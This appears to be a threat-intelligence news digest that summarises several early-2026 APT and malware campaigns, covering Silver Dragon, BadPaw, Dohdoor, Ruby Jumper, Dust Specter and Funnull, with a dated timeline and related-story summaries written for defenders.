Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. Check Point reported on Silver Dragon, a Chinese-aligned activity cluster assessed as operating under the broader APT41 umbrella, targeting organizations in Southeast Asia and Europe (notably government) via exploitation of public-facing servers and phishing, then deploying Cobalt Strike, DNS tunneling, and a new Google Drive–based backdoor (GearDoor) alongside custom tools (SSHcmd and SliverScreen) for remote access and screen capture. Microsoft detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and EV code-signed malware (certificate issued to TrustConnect Software PTY LTD) masquerading as common workplace apps (e.g., msteams.exe, adobereader.exe, zoomworkspace.clientsetup.exe) to install legitimate RMM tooling (ScreenConnect, Tactical RMM, Mesh Agent) for persistent access and lateral movement.
Other reporting highlighted additional, unrelated campaigns and tradecraft: ClearSky described a Russian-aligned operation targeting Ukraine using a phishing-delivered ZIP/HTA chain that drops a .NET loader (BadPaw) and backdoor (MeowMeow) with .NET Reactor obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to APT28). Cofense-reported activity (via SC Media) showed phishing that weaponizes Windows File Explorer + WebDAV using URL/LNK shortcuts to pull payloads (notably AsyncRAT, XWorm, DcRAT) and infrastructure including Cloudflare Tunnel domains hosting WebDAV servers. Cisco Talos-reported Dohdoor activity (UAT-10027) targeted US education and healthcare, using PowerShell→batch→DLL sideloading via legitimate executables (e.g., Fondue.exe, mblctr.exe, ScreenClippingHost.exe) and DNS-over-HTTPS to Cloudflare for C2 discovery and tunneling. Separately, Zscaler reported ScarCruft’s Ruby Jumper campaign using Zoho WorkDrive for C2 and removable media components to reach air-gapped systems, while another Zscaler report analyzed Dust Specter targeting Iraqi government officials with password-protected RAR delivery and modular implants. Qianxin XLab assessed sanctioned infrastructure provider Funnull resurfacing to support scam/criminal supply chains and potential MacCMS-related supply-chain activity, and F5 Labs summarized APT42’s TAMECAT PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
Timeline
Mar 3, 2026
Check Point links Silver Dragon to the APT41 umbrella
Check Point Research published details on Silver Dragon, describing three infection chains, custom tools including GearDoor, SilverScreen, and SSHcmd, and persistent use of Cobalt Strike and DNS tunneling. The company assessed with high confidence that the cluster is linked to a Chinese-nexus actor under the APT41 umbrella.
Mar 3, 2026
ClearSky reveals BadPaw and MeowMeow campaign against Ukraine
ClearSky disclosed a phishing campaign targeting Ukraine that used a ZIP-delivered HTA lure to install the BadPaw loader and MeowMeow backdoor. The firm attributed the activity with high confidence to a Russian state-aligned actor and with low confidence to APT28.
Mar 2, 2026
Qianxin exposes Funnull's RingH23 and MacCMS attacks
Qianxin XLab reported that Funnull had resurfaced with the RingH23 server-side compromise framework and MacCMS supply-chain attacks. The report detailed compromise of GoEdge CDN management nodes, SSH-based lateral movement, rootkit and Nginx-module deployment, and large-scale malicious JavaScript redirection affecting mobile users.
Mar 2, 2026
Cisco Talos discloses Dohdoor malware campaign details
Reporting on March 2, 2026 described the ongoing Dohdoor campaign against U.S. schools and healthcare, including its anti-forensics, process hollowing, and Cloudflare DoH-based C2 techniques. Talos said attribution remained uncertain despite low-confidence overlaps with Lazarus Group tradecraft.
Mar 2, 2026
Zscaler publishes Dust Specter campaign targeting Iraqi officials
Zscaler ThreatLabz disclosed the Dust Specter APT campaign targeting government officials in Iraq using two related malware chains: SPLITDROP/TWINTASK/TWINTALK and GHOSTFORM. The campaign used password-protected archives, DLL sideloading, file-based inter-process tasking, and a Google Forms lure impersonating an Iraqi Ministry of Foreign Affairs survey.
Mar 2, 2026
F5 reports mass exploitation of Magento SessionReaper zero-day
F5 Labs reported that the Magento zero-day CVE-2025-54236, dubbed SessionReaper, was being mass-exploited and had compromised more than 200 stores. The bulletin also highlighted active exploitation of Ivanti EPMM zero-days and other critical flaws requiring urgent patching.
Feb 1, 2026
Microsoft observes signed malware phishing campaigns using workplace lures
In February 2026, Microsoft Defender Experts observed multiple phishing campaigns using meeting and document lures to deliver malware disguised as workplace software. The payloads were signed with an EV certificate issued to TrustConnect Software PTY LTD and deployed RMM tools including ScreenConnect, Tactical RMM, and MeshAgent.
Dec 1, 2025
ThreatLabz identifies ScarCruft's Ruby Jumper campaign
Zscaler ThreatLabz first identified the North Korea-linked Ruby Jumper campaign in December 2025. The operation used malicious LNK files, multiple malware families, Zoho WorkDrive-based C2, and removable media to bridge air-gapped environments.
Dec 1, 2025
Dohdoor campaign begins targeting U.S. schools and healthcare
Cisco Talos said a campaign attributed to UAT-10027 had been active since at least December 2025, primarily targeting U.S. education and healthcare organizations. The operation used phishing, DLL sideloading, and a new Windows backdoor called Dohdoor that relied on DNS-over-HTTPS for C2.
Jul 9, 2025
Funnull expands into MacCMS supply-chain poisoning
Researchers reported that Funnull poisoned the official update channel of the maccms.la edition of MacCMS/AppleCMS in 2025 to deliver PHP backdoors. The backdoors injected Funnull-style JavaScript loaders and redirectors using short-lived payload URLs to hinder forensics.
Jul 9, 2025
Funnull-linked RingH23 activity is first detected
Researchers detected a Linux ELF downloader from download.zhw[.]sh on July 9, 2025, marking the start of observed RingH23 activity attributed to Funnull. Infrastructure such as client.110[.]nz also showed unusually high DNS resolution volume.
Jun 1, 2025
Suspicious CDN1.AI infrastructure is created
Researchers reported that CDN1.AI, a suspicious infrastructure layer later assessed as possibly Funnull-controlled, was created in June 2025. It was later linked to migration of malicious JavaScript hosting used in redirection activity.
May 29, 2025
OFAC sanctions Funnull Technology Inc. and Fangneng CDN
The U.S. Treasury's OFAC sanctioned Funnull Technology Inc. and Fangneng CDN for their role in enabling large-scale pig-butchering scams and related infrastructure abuse. The sanctions became a key reference point in later reporting on Funnull's re-emergence.
Sep 1, 2024
WebDAV malware campaigns escalate sharply
Cofense reported a notable escalation in the WebDAV abuse campaigns in September 2024, with phishing emails—often German-language fake invoices—targeting European corporate networks. Malicious infrastructure included Cloudflare Tunnel domains hosting WebDAV servers.
Jun 15, 2024
Silver Dragon activity starts targeting Europe and Southeast Asia
Check Point assessed the Chinese-aligned Silver Dragon cluster had been active since at least mid-2024 against organizations in Southeast Asia and Europe, especially government entities. The group used exploitation of public-facing servers and phishing to deliver Cobalt Strike and custom tooling.
May 1, 2024
Funnull-linked GoEdge poisoning incidents occur
May 2024 GoEdge poisoning incidents were later cited as sharing strong code and tradecraft overlap with the RingH23 and JavaScript injection activity attributed to Funnull. These earlier incidents helped support the later attribution assessment.
Feb 1, 2024
Polyfill.io supply-chain attack later tied to Funnull-style JS
A February 2024 Polyfill.io supply-chain attack used JavaScript later assessed as nearly identical to code seen in Funnull-linked operations. This similarity was cited as part of later attribution to Funnull.
Feb 1, 2024
WebDAV-based malware delivery campaigns begin
Campaigns abusing Windows File Explorer and the WebDAV protocol to deliver malware such as AsyncRAT, XWorm RAT, and DcRAT were active by February 2024. The attacks used direct links, URL shortcut files, and LNK files to trigger remote WebDAV access from phishing lures.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Malware
Organizations
Sources
5 more from sources like scworld, cyberpress org, qianxin xlab blog and f5
Related Stories
Stealthy Malware Campaigns Abuse Windows and Office Features for Initial Access and Evasion
Multiple early-2026 campaigns highlight increasingly **low-noise initial access** and **living-off-the-land** execution on Windows endpoints. CyStack reported activity attributed to **APT-Q-27 (GoldenEyeDog)** targeting financial institutions via a corporate support workflow: a user clicked a malicious link delivered through a **Zendesk ticket**, leading to download of an executable masquerading as an image/`.pif` file (aided by Windows’ hidden-extension defaults). The malware was signed with a **revoked certificate** that still appeared trusted due to a valid timestamp, and its modular backdoor/C2 infrastructure overlapped with prior APT-Q-27 activity, enabling stealthy persistence and control without triggering common endpoint alerts. Separately, Securonix described the **Dead#Vax** multistage campaign using phishing links to **VHD files hosted on IPFS**, where mounting/opening the VHD triggers **Windows Script Files**, obfuscated batch, and **PowerShell** loaders to support encrypted data theft and conceal execution logic, culminating in **AsyncRAT** deployment for credential theft, surveillance, and follow-on intrusion. In another targeted operation, Zscaler ThreatLabz linked **Operation Neusploit** to **APT28**, exploiting **CVE-2026-21509** (Microsoft Office/365 **OLE** bypass) via crafted **RTF** documents to drop payloads including **MiniDoor** (Outlook-focused collection and mailbox manipulation, including exfiltration to attacker-controlled email accounts) and **PixyNetLoader** (reported to use steganography). A separate “ThreatsDay” bulletin is a multi-story roundup and does not provide additional, specific corroboration on these same campaigns beyond mentioning adjacent themes (e.g., AsyncRAT/C2) in a broader news digest.
3 weeks ago
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
1 months ago
Multiple Malware Campaigns Abuse Phishing and Legitimate Cloud Services to Compromise Windows and Linux Systems
Reporting describes several unrelated but contemporaneous malware operations targeting both Windows and Linux environments. In Taiwan, FortiGuard Labs observed targeted phishing using tax and e-invoice lures to deliver **Winos 4.0 (ValleyRat)** and plugins, with delivery chains including malicious `.LNK` files, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud-hosted infrastructure that reduces the effectiveness of static blocklists. Separately, Cato CTRL reported a new Windows loader, **Foxveil**, that stages and retrieves shellcode via trusted platforms (**Cloudflare Pages**, **Netlify**, and **Discord attachments**) and executes payloads using techniques including **Early Bird APC injection** (often into a fake `svchost.exe`) or self-injection, while persisting via Windows services or masqueraded binaries dropped into `SysWOW64`. Additional reporting covers distinct campaigns in other regions and platforms. A LATAM-focused intrusion chain uses fake bank receipt lures (double-extension such as `.pdf.js`) to deliver **XWorm v5.6**, employing oversized/obfuscated JavaScript, WMI-based process creation (`Win32_Process`) to launch hidden PowerShell, and abuse of a hardcoded **Cloudinary** URL for staging—capabilities consistent with credential theft and enabling follow-on ransomware. Trellix analysis described a separate **Monero** cryptomining operation distributed via pirated software installers that propagates through **USB/external drives** to reach even air-gapped systems, using multi-component “watchdog” self-healing behavior and aggressive defense-evasion. On Linux, LevelBlue detailed a new **SysUpdate** variant (packed `ELF64`) that performs host reconnaissance and uses strong C2 encryption; researchers built a **Unicorn Engine**-based emulation tool to reproduce key generation/encryption routines and decrypt captured C2 traffic for investigation and detection engineering.
1 months ago